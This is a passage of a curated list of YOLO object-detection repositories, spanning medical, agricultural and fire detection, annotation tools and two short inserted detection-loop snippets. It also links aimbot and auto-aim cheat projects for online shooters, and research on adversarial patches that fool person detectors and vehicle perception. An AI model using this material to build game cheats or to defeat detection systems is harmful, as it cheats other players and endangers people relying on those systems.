- [roboflow/supervision](https://github.com/roboflow/supervision) <img src="https://img.shields.io/github/stars/roboflow/supervision?style=social"/> : We write your reusable computer vision tools. ๐Ÿ’œ [roboflow.github.io/supervision](https://roboflow.github.io/supervision/)
- [AntroSafin/Fire_Detection_YoloV5](https://github.com/AntroSafin/Fire_Detection_YoloV5) <img src="https://img.shields.io/github/stars/AntroSafin/Fire_Detection_YoloV5?style=social"/> : This is the YOLOv5 fire detection application.
- [harivams-sai/FireDetectionYOLOv8](https://github.com/harivams-sai/FireDetectionYOLOv8) <img src="https://img.shields.io/github/stars/harivams-sai/FireDetectionYOLOv8?style=social"/> : A fire detection model based on the YOLOv8 Ultralytics model for object detection. Tech: Python, computer vision, Colab notebook, fire detection, YOLOv8.
- [e-candeloro/SAURUSS-Autonomous-Drone-Surveillance](https://github.com/e-candeloro/SAURUSS-Autonomous-Drone-Surveillance) <img src="https://img.shields.io/github/stars/e-candeloro/SAURUSS-Autonomous-Drone-Surveillance?style=social"/> : An autonomous drone and sensor based surveillance system that uses a Tello drone, an Arduino, a Raspberry Pi and an Android smartphone.
- [pedbrgs/Fire-Detection](https://github.com/pedbrgs/Fire-Detection) <img src="https://img.shields.io/github/stars/pedbrgs/Fire-Detection?style=social"/> : Fire and smoke detection using spatial and temporal patterns.
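The fire and smoke projects above typically wrap the detector in the same alarm loop: read frames, run the model, and only raise an alert when detections persist over several consecutive frames so that single-frame flicker does not trigger false alarms. A minimal sketch of that loop; the checkpoint `fire.pt`, the class name `fire`, the stream URL, and the thresholds are all assumptions:

```python
# Raise an alarm only when fire is detected in N consecutive frames.
import cv2
import torch

model = torch.hub.load("ultralytics/yolov5", "custom", path="fire.pt")
cap = cv2.VideoCapture("rtsp://camera/stream")  # hypothetical RTSP stream
streak, N = 0, 5                                # debounce window (frames)

while cap.isOpened():
    ok, frame = cap.read()
    if not ok:
        break
    df = model(frame[..., ::-1]).pandas().xyxy[0]   # BGR -> RGB for the model
    hit = ((df["name"] == "fire") & (df["confidence"] > 0.5)).any()
    streak = streak + 1 if hit else 0
    if streak >= N:
        print("FIRE ALARM")   # hook up a real notifier here
        streak = 0            # re-arm after alerting
cap.release()
```

The consecutive-frame debounce is a cheap form of temporal smoothing; raising `N` trades alert latency for fewer false positives.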
- ### Medical Field Detection
#### ๅŒปๅญฆ้ข†ๅŸŸๆฃ€ๆต‹
- [DataXujing/YOLO-v5](https://github.com/DataXujing/YOLO-v5) <img src="https://img.shields.io/github/stars/DataXujing/YOLO-v5?style=social"/> : Application of YOLOv5 to object detection in digestive endoscopy in the medical field.
- [Jafar-Abdollahi/Automated-detection-of-COVID-19-cases-using-deep-neural-networks-with-CTS-images](https://github.com/Jafar-Abdollahi/Automated-detection-of-COVID-19-cases-using-deep-neural-networks-with-CTS-images) <img src="https://img.shields.io/github/stars/Jafar-Abdollahi/Automated-detection-of-COVID-19-cases-using-deep-neural-networks-with-CTS-images?style=social"/> : In this project, a new model for automatic detection of COVID-19 using raw chest X-ray images is presented.
- [fahriwps/breast-cancer-detection](https://github.com/fahriwps/breast-cancer-detection) <img src="https://img.shields.io/github/stars/fahriwps/breast-cancer-detection?style=social"/> : Breast cancer mass detection using the YOLO object detection algorithm and a GUI.
- [niehusst/YOLO-Cancer-Detection](https://github.com/niehusst/YOLO-Cancer-Detection) <img src="https://img.shields.io/github/stars/niehusst/YOLO-Cancer-Detection?style=social"/> : An implementation of the YOLO algorithm trained to spot tumors in DICOM images.
- [safakgunes/Blood-Cancer-Detection-YOLOV5](https://github.com/safakgunes/Blood-Cancer-Detection-YOLOV5) <img src="https://img.shields.io/github/stars/safakgunes/Blood-Cancer-Detection-YOLOV5?style=social"/> : Blood cancer detection with YOLOv5.
- [shchiang0708/YOLOv2_skinCancer](https://github.com/shchiang0708/YOLOv2_skinCancer) <img src="https://img.shields.io/github/stars/shchiang0708/YOLOv2_skinCancer?style=social"/> : YOLOv2_skinCancer.
- [avral1810/parkinsongait](https://github.com/avral1810/parkinsongait) <img src="https://img.shields.io/github/stars/avral1810/parkinsongait?style=social"/> : Parkinson's disease.
- [sierprinsky/YoloV5_blood_cells](https://github.com/sierprinsky/YoloV5_blood_cells) <img src="https://img.shields.io/github/stars/sierprinsky/YoloV5_blood_cells?style=social"/> : The main idea of this project is to detect blood cells using YOLOv5 on a public Roboflow dataset.
- [LuozyCS/skin_disease_detection_yolov5](https://github.com/LuozyCS/skin_disease_detection_yolov5) <img src="https://img.shields.io/github/stars/LuozyCS/skin_disease_detection_yolov5?style=social"/> : skin_disease_detection_yolov5.
- [Moqixis/object_detection_yolov5_deepsort](https://github.com/Moqixis/object_detection_yolov5_deepsort) <img src="https://img.shields.io/github/stars/Moqixis/object_detection_yolov5_deepsort?style=social"/> : Polyp detection based on yolov5 + deepsort.
- [mdciri/YOLOv7-Bone-Fracture-Detection](https://github.com/mdciri/YOLOv7-Bone-Fracture-Detection) <img src="https://img.shields.io/github/stars/mdciri/YOLOv7-Bone-Fracture-Detection?style=social"/> : YOLOv7 to detect bone fractures on X-ray images.
- [MIRACLE-Center/YOLO_Universal_Anatomical_Landmark_Detection](https://github.com/MIRACLE-Center/YOLO_Universal_Anatomical_Landmark_Detection) <img src="https://img.shields.io/github/stars/MIRACLE-Center/YOLO_Universal_Anatomical_Landmark_Detection?style=social"/> : "You Only Learn Once: Universal Anatomical Landmark Detection". (**[MICCAI 2021](https://arxiv.org/abs/2103.04657)**)
- [mkang315/CST-YOLO](https://github.com/mkang315/CST-YOLO) <img src="https://img.shields.io/github/stars/mkang315/CST-YOLO?style=social"/> : Official implementation of "CST-YOLO: A Novel Method for Blood Cell Detection Based on Improved YOLOv7 and CNN-Swin Transformer".
- ### Chemistry Field Detection
#### ๅŒ–ๅญฆ้ข†ๅŸŸๆฃ€ๆต‹
- [xuguodong1999/COCR](https://github.com/xuguodong1999/COCR) <img src="https://img.shields.io/github/stars/xuguodong1999/COCR?style=social"/> : COCR is designed to convert an image of a hand-written chemical structure into the graph of that molecule.
- ### Agricultural Field Detection
#### ๅ†œไธš้ข†ๅŸŸๆฃ€ๆต‹
- [liao1fan/MGA-YOLO-for-apple-leaf-disease-detection](https://github.com/liao1fan/MGA-YOLO-for-apple-leaf-disease-detection) <img src="https://img.shields.io/github/stars/liao1fan/MGA-YOLO-for-apple-leaf-disease-detection?style=social"/> : MGA-YOLO: A Lightweight One-Stage Network for Apple Leaf Disease Detection.
- [tanmaypandey7/wheat-detection](https://github.com/tanmaypandey7/wheat-detection) <img src="https://img.shields.io/github/stars/tanmaypandey7/wheat-detection?style=social"/> : Detecting wheat heads using YOLOv5.
- [WoodratTradeCo/crop-rows-detection](https://github.com/WoodratTradeCo/crop-rows-detection) <img src="https://img.shields.io/github/stars/WoodratTradeCo/crop-rows-detection?style=social"/> : A real-time crop-row detection method using YOLOv5.
- [denghv/Vegetables_Fruit_Detection](https://github.com/denghv/Vegetables_Fruit_Detection) <img src="https://img.shields.io/github/stars/denghv/Vegetables_Fruit_Detection?style=social"/> : Using YOLOv10 to detect vegetables & fruit.
- ### Sports Field Detection
#### ไฝ“่‚ฒ้ข†ๅŸŸๆฃ€ๆต‹
- [tomer-erez/pingpong-referee](https://github.com/tomer-erez/pingpong-referee) <img src="https://img.shields.io/github/stars/tomer-erez/pingpong-referee?style=social"/> : Using the YOLO algorithm for an automated ping-pong referee.
- ### Adverse Weather Conditions
#### ๆถๅŠฃๅคฉๆฐ”ๆƒ…ๅ†ต
- [LLVIP](https://github.com/bupt-ai-cz/LLVIP) <img src="https://img.shields.io/github/stars/bupt-ai-cz/LLVIP?style=social"/> : "LLVIP: A Visible-infrared Paired Dataset for Low-light Vision". (**[ICCV 2021](https://openaccess.thecvf.com/content/ICCV2021W/RLQ/html/Jia_LLVIP_A_Visible-Infrared_Paired_Dataset_for_Low-Light_Vision_ICCVW_2021_paper.html)**)
- [Image-Adaptive YOLO](https://github.com/wenyyu/Image-Adaptive-YOLO) <img src="https://img.shields.io/github/stars/wenyyu/Image-Adaptive-YOLO?style=social"/> : "Image-Adaptive YOLO for Object Detection in Adverse Weather Conditions". (**[AAAI 2022](https://arxiv.org/abs/2112.08088)**).
"่ฎก็ฎ—ๆœบ่ง†่ง‰็ ”็ฉถ้™ข๏ผšใ€Š[ๅ›พๅƒ่‡ช้€‚ๅบ”YOLO๏ผšๆจก็ณŠ็Žฏๅขƒไธ‹็š„็›ฎๆ ‡ๆฃ€ๆต‹๏ผˆ้™„ๆบไปฃ็ ๏ผ‰](https://mp.weixin.qq.com/s/QdM6Dx990VhN97MRIP74XA)ใ€‹" - ### Adversarial Attack and Defense #### ๅฏนๆŠ—ๆ”ปๅ‡ปไธŽ้˜ฒๅพก - [EAVISE/adversarial-yolo](https://gitlab.com/EAVISE/adversarial-yolo) : "Fooling automated surveillance cameras: adversarial patches to attack person detection". (**[CVPR 2019](https://openaccess.thecvf.com/content_CVPRW_2019/html/CV-COPS/Thys_Fooling_Automated_Surveillance_Cameras_Adversarial_Patches_to_Attack_Person_Detection_CVPRW_2019_paper.html)**) - [git-disl/TOG](https://github.com/git-disl/TOG) <img src="https://img.shields.io/github/stars/git-disl/TOG?style=social"/> : "Adversarial Objectness Gradient Attacks on Real-time Object Detection Systems". (**[IEEE TPS-ISA 2020](https://ieeexplore.ieee.org/abstract/document/9325397)**) | "Understanding Object Detection Through an Adversarial Lens". (**[ESORICS 2020](https://link.springer.com/chapter/10.1007/978-3-030-59013-0_23)**) - [VITA-Group/3D_Adversarial_Logo](https://github.com/VITA-Group/3D_Adversarial_Logo) <img src="https://img.shields.io/github/stars/VITA-Group/3D_Adversarial_Logo?style=social"/> : 3D adversarial logo attack on different3D object meshes to fool a YOLOV2 detector. "Can 3D Adversarial Logos Clock Humans?". (**[arXiv 2020](https://arxiv.org/abs/2006.14655)**) - [ASGuard-UCI/MSF-ADV](https://github.com/ASGuard-UCI/MSF-ADV) <img src="https://img.shields.io/github/stars/ASGuard-UCI/MSF-ADV?style=social"/> : MSF-ADV is a novel physical-world adversarial attack method, which can fool the Multi Sensor Fusion (MSF) based autonomous driving (AD) perception in the victim autonomous vehicle (AV) to fail in detecting a front obstacle and thus crash into it. "Invisible for both Camera and LiDAR: Security of Multi-Sensor Fusion based Perception in Autonomous Driving Under Physical-World Attacks". (**[IEEE S&P 2021](https://www.computer.org/csdl/proceedings-article/sp/2021/893400b302/1t0x9btzenu)**) - [veralauee/DPatch](https://github.com/veralauee/DPatch) <img src="https://img.shields.io/github/stars/veralauee/DPatch?style=social"/> : "DPatch: An Adversarial Patch Attack on Object Detectors". (**[arXiv 2018](https://arxiv.org/abs/1806.02299)**) - [Shudeng/GPAttack](https://github.com/Shudeng/GPAttack) <img src="https://img.shields.io/github/stars/Shudeng/GPAttack?style=social"/> : Grid Patch Attack for Object Detection. - [Wu-Shudeng/DPAttack](https://github.com/Wu-Shudeng/DPAttack) <img src="https://img.shields.io/github/stars/Wu-Shudeng/DPAttack?style=social"/> : "DPAttack: Diffused Patch Attacks against Universal Object Detection". (**[arXiv 2020](https://arxiv.org/abs/2010.11679)**) - [FenHua/DetDak](https://github.com/FenHua/DetDak) <img src="https://img.shields.io/github/stars/FenHua/DetDak?style=social"/> : Patch adversarial attack; object detection; CIKM2020 ๅฎ‰ๅ…จAIๆŒ‘ๆˆ˜่€…่ฎกๅˆ’็ฌฌๅ››ๆœŸ๏ผš้€š็”จ็›ฎๆ ‡ๆฃ€ๆต‹็š„ๅฏนๆŠ—ๆ”ปๅ‡ปใ€‚ "Object Hider: Adversarial Patch Attack Against Object Detectors". (**[arXiv 2020](https://arxiv.org/abs/2010.14974)**) - [THUrssq/Tianchi04](https://github.com/THUrssq/Tianchi04) <img src="https://img.shields.io/github/stars/THUrssq/Tianchi04?style=social"/> : This is NO.4 solution for "CIKM-2020 Alibaba-Tsinghua Adversarial Challenge on Object Detection". "Sparse Adversarial Attack to Object Detection". 
- [mesunhlf/UPC-tf](https://github.com/mesunhlf/UPC-tf) <img src="https://img.shields.io/github/stars/mesunhlf/UPC-tf?style=social"/> : "Universal Physical Camouflage Attacks on Object Detectors". (**[CVPR 2020](https://openaccess.thecvf.com/content_CVPR_2020/html/Huang_Universal_Physical_Camouflage_Attacks_on_Object_Detectors_CVPR_2020_paper.html)**)
- [alex96295/YOLOv3_adversarial_defense](https://github.com/alex96295/YOLOv3_adversarial_defense) <img src="https://img.shields.io/github/stars/alex96295/YOLOv3_adversarial_defense?style=social"/> : YOLOv3_adversarial_defense.
- [alex96295/YOLO_adversarial_attacks](https://github.com/alex96295/YOLO_adversarial_attacks) <img src="https://img.shields.io/github/stars/alex96295/YOLO_adversarial_attacks?style=social"/> : YOLO_adversarial_attacks.
- [alex96295/Adversarial-Patch-Attacks-TRAINING-YOLO-SSD-Pytorch](https://github.com/alex96295/Adversarial-Patch-Attacks-TRAINING-YOLO-SSD-Pytorch) <img src="https://img.shields.io/github/stars/alex96295/Adversarial-Patch-Attacks-TRAINING-YOLO-SSD-Pytorch?style=social"/> : This repository has the code needed to train 'Adversarial Patch Attacks' on YOLO and SSD models for object detection in PyTorch.
- [FranBesq/attack-yolo](https://github.com/FranBesq/attack-yolo) <img src="https://img.shields.io/github/stars/FranBesq/attack-yolo?style=social"/> : Developing adversarial attacks on the YOLO algorithm for computer vision.
- [Rushi314/GPR-Object-Detection](https://github.com/Rushi314/GPR-Object-Detection) <img src="https://img.shields.io/github/stars/Rushi314/GPR-Object-Detection?style=social"/> : Detecting objects in ground-penetrating radar scans.
- [realtxy/pso-adversarial-yolo_v3](https://github.com/realtxy/pso-adversarial-yolo_v3) <img src="https://img.shields.io/github/stars/realtxy/pso-adversarial-yolo_v3?style=social"/> : pso-adversarial-yolo_v3.
- [sowgali/ObjCAM](https://github.com/sowgali/ObjCAM) <img src="https://img.shields.io/github/stars/sowgali/ObjCAM?style=social"/> : Visualizations for adversarial attacks in object detectors like YOLO.
- [andrewpatrickdu/adversarial-yolov3-cowc](https://github.com/andrewpatrickdu/adversarial-yolov3-cowc) <img src="https://img.shields.io/github/stars/andrewpatrickdu/adversarial-yolov3-cowc?style=social"/> : "Physical Adversarial Attacks on an Aerial Imagery Object Detector". (**[WACV 2022](https://openaccess.thecvf.com/content/WACV2022/html/Du_Physical_Adversarial_Attacks_on_an_Aerial_Imagery_Object_Detector_WACV_2022_paper.html)**)
- [IQTLabs/camolo](https://github.com/IQTLabs/camolo) <img src="https://img.shields.io/github/stars/IQTLabs/camolo?style=social"/> : Camouflage YOLO (CAMOLO) trains adversarial patches to confuse the YOLO family of object detectors.
- [AdvTexture](https://github.com/WhoTHU/Adversarial_Texture) <img src="https://img.shields.io/github/stars/WhoTHU/Adversarial_Texture?style=social"/> : "Adversarial Texture for Fooling Person Detectors in the Physical World". (**[CVPR 2022](https://openaccess.thecvf.com/content/CVPR2022/html/Hu_Adversarial_Texture_for_Fooling_Person_Detectors_in_the_Physical_World_CVPR_2022_paper.html)**).
"็ŸฅไนŽใ€ŒWhoTHใ€ใ€Š[CVPR2022 Oral ็‰ฉ็†ๅฏนๆŠ—ๆ ทๆœฌ ๅฆ‚ไฝ•ๅšไธ€ไปถโ€œ้šๅฝข่กฃโ€](https://zhuanlan.zhihu.com/p/499854846)ใ€‹"ใ€‚ - [SamSamhuns/yolov5_adversarial](https://github.com/SamSamhuns/yolov5_adversarial) <img src="https://img.shields.io/github/stars/SamSamhuns/yolov5_adversarial?style=social"/> : Generate adversarial patches against YOLOv5 ๐Ÿš€ - ### Game Field Detection #### ๆธธๆˆ้ข†ๅŸŸๆฃ€ๆต‹ - [petercunha/Pine](https://github.com/petercunha/Pine) <img src="https://img.shields.io/github/stars/petercunha/Pine?style=social"/> : ๐ŸŒฒ Aimbot powered by real-time object detection with neural networks, GPU accelerated with Nvidia. Optimized for use with CS:GO. - [chaoyu1999/FPSAutomaticAiming](https://github.com/chaoyu1999/FPSAutomaticAiming) <img src="https://img.shields.io/github/stars/chaoyu1999/FPSAutomaticAiming?style=social"/> : ๅŸบไบŽyolov5็š„FPS็ฑปๆธธๆˆAI่‡ช็ž„AIใ€‚ - [Lu-tju/CSGO_AI](https://github.com/Lu-tju/CSGO_AI) <img src="https://img.shields.io/github/stars/Lu-tju/CSGO_AI?style=social"/> : ๅŸบไบŽYOLOv3็š„csgo่‡ช็ž„ใ€‚ - [kir486680/csgo_aim](https://github.com/kir486680/csgo_aim) <img src="https://img.shields.io/github/stars/kir486680/csgo_aim?style=social"/> : Aim assist for CSGO with python and yolo. - [c925777075/yolov5-dnf](https://github.com/c925777075/yolov5-dnf) <img src="https://img.shields.io/github/stars/c925777075/yolov5-dnf?style=social"/> : yolov5-DNF. - [davidhoung2/APEX-yolov5-aim-assist](https://github.com/davidhoung2/APEX-yolov5-aim-assist) <img src="https://img.shields.io/github/stars/davidhoung2/APEX-yolov5-aim-assist?style=social"/> : using yolov5 to help you aim enemies. - [Brednan/CSGO-Aimbot](https://github.com/Brednan/CSGO-Aimbot) <img src="https://img.shields.io/github/stars/Brednan/CSGO-Aimbot?style=social"/> : Aimbot for the FPS game CSGO. It uses YOLOv5 to detect enemy players on my screen, then moves my cursor to the location. - [2319590263/yolov5-csgo](https://github.com/2319590263/yolov5-csgo) <img src="https://img.shields.io/github/stars/2319590263/yolov5-csgo?style=social"/> : ๅŸบไบŽyolov5ๅฎž็Žฐ็š„csgo่‡ช็ž„ใ€‚ - [SCRN-VRC/YOLOv4-Tiny-in-UnityCG-HLSL](https://github.com/SCRN-VRC/YOLOv4-Tiny-in-UnityCG-HLSL) <img src="https://img.shields.io/github/stars/SCRN-VRC/YOLOv4-Tiny-in-UnityCG-HLSL?style=social"/> : A modern object detector inside fragment shaders. - [qcjxs-hn/yolov5-csgo](https://github.com/qcjxs-hn/yolov5-csgo) <img src="https://img.shields.io/github/stars/qcjxs-hn/yolov5-csgo?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชๆ นๆฎๆ•™็จ‹ๅ†™็š„csgo-aiๅ’Œๆˆ‘่‡ชๅทฑ่ฎญ็ปƒ็š„ๆจกๅž‹๏ผŒ่ฟ˜ๆœ‰ๆ•ฐๆฎ้›†ใ€‚ - [Sequoia](https://github.com/IgaoGuru/Sequoia) <img src="https://img.shields.io/github/stars/IgaoGuru/Sequoia?style=social"/> : A neural network for CounterStrike:GlobalOffensive character detection and classification. Built on a custom-made dataset (csgo-data-collector). - [ItGarbager/aimcf_yolov5](https://github.com/ItGarbager/aimcf_yolov5) <img src="https://img.shields.io/github/stars/ItGarbager/aimcf_yolov5?style=social"/> : ไฝฟ็”จyolov5็ฎ—ๆณ•ๅฎž็Žฐcf่ง’่‰ฒๅคด้ƒจ้ข„ๆต‹ใ€‚ - [jiaran-takeme/Target-Detection-for-CSGO-by-YOLOv5](https://github.com/jiaran-takeme/Target-Detection-for-CSGO-by-YOLOv5) <img src="https://img.shields.io/github/stars/jiaran-takeme/Target-Detection-for-CSGO-by-YOLOv5?style=social"/> : Target Detection for CSGO by YOLOv5. - [Lucid1ty/Yolov5ForCSGO](https://github.com/Lucid1ty/Yolov5ForCSGO) <img src="https://img.shields.io/github/stars/Lucid1ty/Yolov5ForCSGO?style=social"/> : CSGO character detection and auto aim. 
- [leo4048111/Yolov5-LabelMaker-For-CSGO](https://github.com/leo4048111/Yolov5-LabelMaker-For-CSGO) <img src="https://img.shields.io/github/stars/leo4048111/Yolov5-LabelMaker-For-CSGO?style=social"/> : A simple tool for making a CSGO dataset in YOLO format.
- [soloist-v/AutoStrike](https://github.com/soloist-v/AutoStrike) <img src="https://img.shields.io/github/stars/soloist-v/AutoStrike?style=social"/> : Automatic aiming with YOLOv5; supports FPS games, and the mouse-movement control needs to be tuned by yourself.
- [slyautomation/osrs_yolov5](https://github.com/slyautomation/osrs_yolov5) <img src="https://img.shields.io/github/stars/slyautomation/osrs_yolov5?style=social"/> : YOLOv5 object detection in OSRS using Python code, detecting cows (botting).
- [HarunoWindy/yolo-games-weights](https://github.com/HarunoWindy/yolo-games-weights) <img src="https://img.shields.io/github/stars/HarunoWindy/yolo-games-weights?style=social"/> : YOLOv5 deep-learning vision for detecting game UIs (currently supports: Onmyoji).
- [mrathena/python.yolo.csgo.autoaim.helper](https://github.com/mrathena/python.yolo.csgo.autoaim.helper) <img src="https://img.shields.io/github/stars/mrathena/python.yolo.csgo.autoaim.helper?style=social"/> : Python Yolo v5 6.2 Csgo.
- [Aa-bN/AimYolo](https://github.com/Aa-bN/AimYolo) <img src="https://img.shields.io/github/stars/Aa-bN/AimYolo?style=social"/> : An AI plug-in: a targeting aid for shooting games based on YOLOv5.
- [suixin1424/cf-yolo-trt](https://github.com/suixin1424/cf-yolo-trt) <img src="https://img.shields.io/github/stars/suixin1424/cf-yolo-trt?style=social"/> : CrossFire AI auto-aim based on yolov5-trt.
- [DuGuYifei/Yolov5_FPS_AICheatPrinciple](https://github.com/DuGuYifei/Yolov5_FPS_AICheatPrinciple) <img src="https://img.shields.io/github/stars/DuGuYifei/Yolov5_FPS_AICheatPrinciple?style=social"/> : The working principle of AI cheats in FPS games (for learning purposes only).
- [MistyAI/MistyFN](https://github.com/MistyAI/MistyFN) <img src="https://img.shields.io/github/stars/MistyAI/MistyFN?style=social"/> : Aimbot and Triggerbot for Fortnite based on artificial intelligence.
- [suixin1424/crossfire-yolo-TensorRT](https://github.com/suixin1424/crossfire-yolo-TensorRT) <img src="https://img.shields.io/github/stars/suixin1424/crossfire-yolo-TensorRT?style=social"/> : crossfire-yolo-TensorRT. CrossFire AI auto-aim based on yolo-trt.
- [EthanH3514/AL_Yolo](https://github.com/EthanH3514/AL_Yolo) <img src="https://img.shields.io/github/stars/EthanH3514/AL_Yolo?style=social"/> : An Apex Legends AI aim-assist cheat based on YOLOv5.
- [SunOner/yolov8_aimbot](https://github.com/SunOner/yolov8_aimbot) <img src="https://img.shields.io/github/stars/SunOner/yolov8_aimbot?style=social"/> : Aim-bot based on AI for all FPS games.
- [bigQY/calabiyau-cheat](https://github.com/bigQY/calabiyau-cheat) <img src="https://img.shields.io/github/stars/bigQY/calabiyau-cheat?style=social"/> : Calabiyau auto-aim based on YOLOv10.
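Technically, the projects above share one building block: capture frames from the screen and run a detector on them. A minimal detection-only sketch of that loop (cursor control deliberately omitted), assuming the third-party `mss`, `ultralytics`, and `opencv-python` packages and a local `yolov8n.pt` weight file:

```python
# Screen capture + YOLO inference loop (detection only, no input control).
# Assumes: pip install mss ultralytics opencv-python
import cv2
import mss
import numpy as np
from ultralytics import YOLO

model = YOLO("yolov8n.pt")  # any YOLOv8 weight file

with mss.mss() as sct:
    monitor = sct.monitors[1]  # primary monitor
    while True:
        # mss returns BGRA pixels; drop the alpha channel to get BGR
        frame = np.array(sct.grab(monitor))[:, :, :3]
        results = model(frame, verbose=False)
        annotated = results[0].plot()  # draw boxes on the frame
        cv2.imshow("detections", annotated)
        if cv2.waitKey(1) & 0xFF == ord("q"):
            break
cv2.destroyAllWindows()
```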
- ### Automatic Annotation Tools #### ่‡ชๅŠจๆ ‡ๆณจๅทฅๅ…ท
- [Label Studio](https://github.com/HumanSignal/label-studio) <img src="https://img.shields.io/github/stars/HumanSignal/label-studio?style=social"/> : Label Studio is a multi-type data labeling and annotation tool with standardized output format. [labelstud.io](https://labelstud.io/)
- [AnyLabeling](https://github.com/vietanhdev/anylabeling) <img src="https://img.shields.io/github/stars/vietanhdev/anylabeling?style=social"/> : ๐ŸŒŸ AnyLabeling ๐ŸŒŸ. Effortless AI-assisted data labeling with AI support from YOLO, Segment Anything, MobileSAM!! [anylabeling.nrl.ai](https://anylabeling.nrl.ai/)
- [X-AnyLabeling](https://github.com/CVHub520/X-AnyLabeling) <img src="https://img.shields.io/github/stars/CVHub520/X-AnyLabeling?style=social"/> : ๐Ÿ’ซ X-AnyLabeling ๐Ÿ’ซ. An advanced automatic annotation tool integrating multiple SOTA models! Effortless data labeling with AI support from Segment Anything and other awesome models.
- [Label Anything](https://github.com/open-mmlab/playground/tree/main/label_anything) <img src="https://img.shields.io/github/stars/open-mmlab/playground?style=social"/> : OpenMMLab PlayGround: Semi-Automated Annotation with Label-Studio and SAM.
- [LabelImg](https://github.com/heartexlabs/labelImg) <img src="https://img.shields.io/github/stars/heartexlabs/labelImg?style=social"/> : ๐Ÿ–๏ธ LabelImg is a graphical image annotation tool to label object bounding boxes in images.
- [labelme](https://github.com/wkentaro/labelme) <img src="https://img.shields.io/github/stars/wkentaro/labelme?style=social"/> : Image Polygonal Annotation with Python (polygon, rectangle, circle, line, point and image-level flag annotation).
- [DarkLabel](https://github.com/darkpgmr/DarkLabel) <img src="https://img.shields.io/github/stars/darkpgmr/DarkLabel?style=social"/> : Video/Image Labeling and Annotation Tool.
- [AlexeyAB/Yolo_mark](https://github.com/AlexeyAB/Yolo_mark) <img src="https://img.shields.io/github/stars/AlexeyAB/Yolo_mark?style=social"/> : GUI for marking bounding boxes of objects in images for training the YOLO v3 and v2 neural networks.
- [Cartucho/OpenLabeling](https://github.com/Cartucho/OpenLabeling) <img src="https://img.shields.io/github/stars/Cartucho/OpenLabeling?style=social"/> : Label images and video for Computer Vision applications.
- [CVAT](https://github.com/cvat-ai/cvat) <img src="https://img.shields.io/github/stars/cvat-ai/cvat?style=social"/> : Computer Vision Annotation Tool (CVAT). Annotate better with CVAT, the industry-leading data engine for machine learning. Used and trusted by teams at any scale, for data of any scale.
- [VoTT](https://github.com/Microsoft/VoTT) <img src="https://img.shields.io/github/stars/Microsoft/VoTT?style=social"/> : Visual Object Tagging Tool: An electron app for building end to end Object Detection Models from Images and Videos.
- [WangRongsheng/KDAT](https://github.com/WangRongsheng/KDAT) <img src="https://img.shields.io/github/stars/WangRongsheng/KDAT?style=social"/> : A set of annotation tools dedicated to the full object detection workflow in computer vision; full name: Kill Object Detection Annotation Tools.
- [Rectlabel-support](https://github.com/ryouchinsa/Rectlabel-support) <img src="https://img.shields.io/github/stars/ryouchinsa/Rectlabel-support?style=social"/> : RectLabel - An image annotation tool to label images for bounding box object detection and segmentation.
- [cnyvfang/labelGo-Yolov5AutoLabelImg](https://github.com/cnyvfang/labelGo-Yolov5AutoLabelImg) <img src="https://img.shields.io/github/stars/cnyvfang/labelGo-Yolov5AutoLabelImg?style=social"/> : ๐Ÿ’•A YOLOv5 semi-automatic annotation tool (based on labelImg).๐Ÿ’•
- [CVUsers/Auto_maker](https://github.com/CVUsers/Auto_maker) <img src="https://img.shields.io/github/stars/CVUsers/Auto_maker?style=social"/> : Open-source automatic data annotator for deep learning, covering object detection and image classification (high accuracy, high efficiency).
- [MyVision](https://github.com/OvidijusParsiunas/myvision) <img src="https://img.shields.io/github/stars/OvidijusParsiunas/myvision?style=social"/> : Computer vision based ML training data generation tool ๐Ÿš€
- [wufan-tb/AutoLabelImg](https://github.com/wufan-tb/AutoLabelImg) <img src="https://img.shields.io/github/stars/wufan-tb/AutoLabelImg?style=social"/> : Auto-labelimg based on yolov5, with many other useful tools.
- [MrZander/YoloMarkNet](https://github.com/MrZander/YoloMarkNet) <img src="https://img.shields.io/github/stars/MrZander/YoloMarkNet?style=social"/> : Darknet YOLOv2/3 annotation tool written in C#/WPF.
- [mahxn0/Yolov3_ForTextLabel](https://github.com/mahxn0/Yolov3_ForTextLabel) <img src="https://img.shields.io/github/stars/mahxn0/Yolov3_ForTextLabel?style=social"/> : Automatic annotation tool for objects and natural-scene text based on YOLOv3.
- [MNConnor/YoloV5-AI-Label](https://github.com/MNConnor/YoloV5-AI-Label) <img src="https://img.shields.io/github/stars/MNConnor/YoloV5-AI-Label?style=social"/> : YoloV5 AI Assisted Labeling.
- [LILINOpenGitHub/Labeling-Tool](https://github.com/LILINOpenGitHub/Labeling-Tool) <img src="https://img.shields.io/github/stars/LILINOpenGitHub/Labeling-Tool?style=social"/> : Free YOLO AI labeling tool. YOLO AI labeling tool is a Windows app for labeling YOLO datasets.
- [whs0523003/YOLOv5_6.1_autolabel](https://github.com/whs0523003/YOLOv5_6.1_autolabel) <img src="https://img.shields.io/github/stars/whs0523003/YOLOv5_6.1_autolabel?style=social"/> : YOLOv5 6.1 automatic bounding-box labeling.
- [2vin/PyYAT](https://github.com/2vin/PyYAT) <img src="https://img.shields.io/github/stars/2vin/PyYAT?style=social"/> : Semi-Automatic Yolo Annotation Tool In Python.
- [AlturosDestinations/Alturos.ImageAnnotation](https://github.com/AlturosDestinations/Alturos.ImageAnnotation) <img src="https://img.shields.io/github/stars/AlturosDestinations/Alturos.ImageAnnotation?style=social"/> : A collaborative tool for labeling image data for yolo.
- [stephanecharette/DarkMark](https://github.com/stephanecharette/DarkMark) <img src="https://img.shields.io/github/stars/stephanecharette/DarkMark?style=social"/> : Marking up images for use with Darknet.
- [2vin/yolo_annotation_tool](https://github.com/2vin/yolo_annotation_tool) <img src="https://img.shields.io/github/stars/2vin/yolo_annotation_tool?style=social"/> : Annotation tool for YOLO in OpenCV.
- [sanfooh/quick_yolo2_label_tool](https://github.com/sanfooh/quick_yolo2_label_tool) <img src="https://img.shields.io/github/stars/sanfooh/quick_yolo2_label_tool?style=social"/> : A quick YOLO labeling tool.
- [folkien/yaya](https://github.com/folkien/yaya) <img src="https://img.shields.io/github/stars/folkien/yaya?style=social"/> : YAYA - Yet another YOLO annotator for images (in Qt5). Supports the YOLO format, image modifications, labeling, and detecting with a previously trained detector.
- [pylabel-project/pylabel](https://github.com/pylabel-project/pylabel) <img src="https://img.shields.io/github/stars/pylabel-project/pylabel?style=social"/> : Python library for computer vision labeling tasks. The core functionality is to translate bounding box annotations between different formats, for example from COCO to YOLO.
- [opendatalab/labelU](https://github.com/opendatalab/labelU) <img src="https://img.shields.io/github/stars/opendatalab/labelU?style=social"/> : Uniform, Unlimited, Universal and Unbelievable Annotation Toolbox.
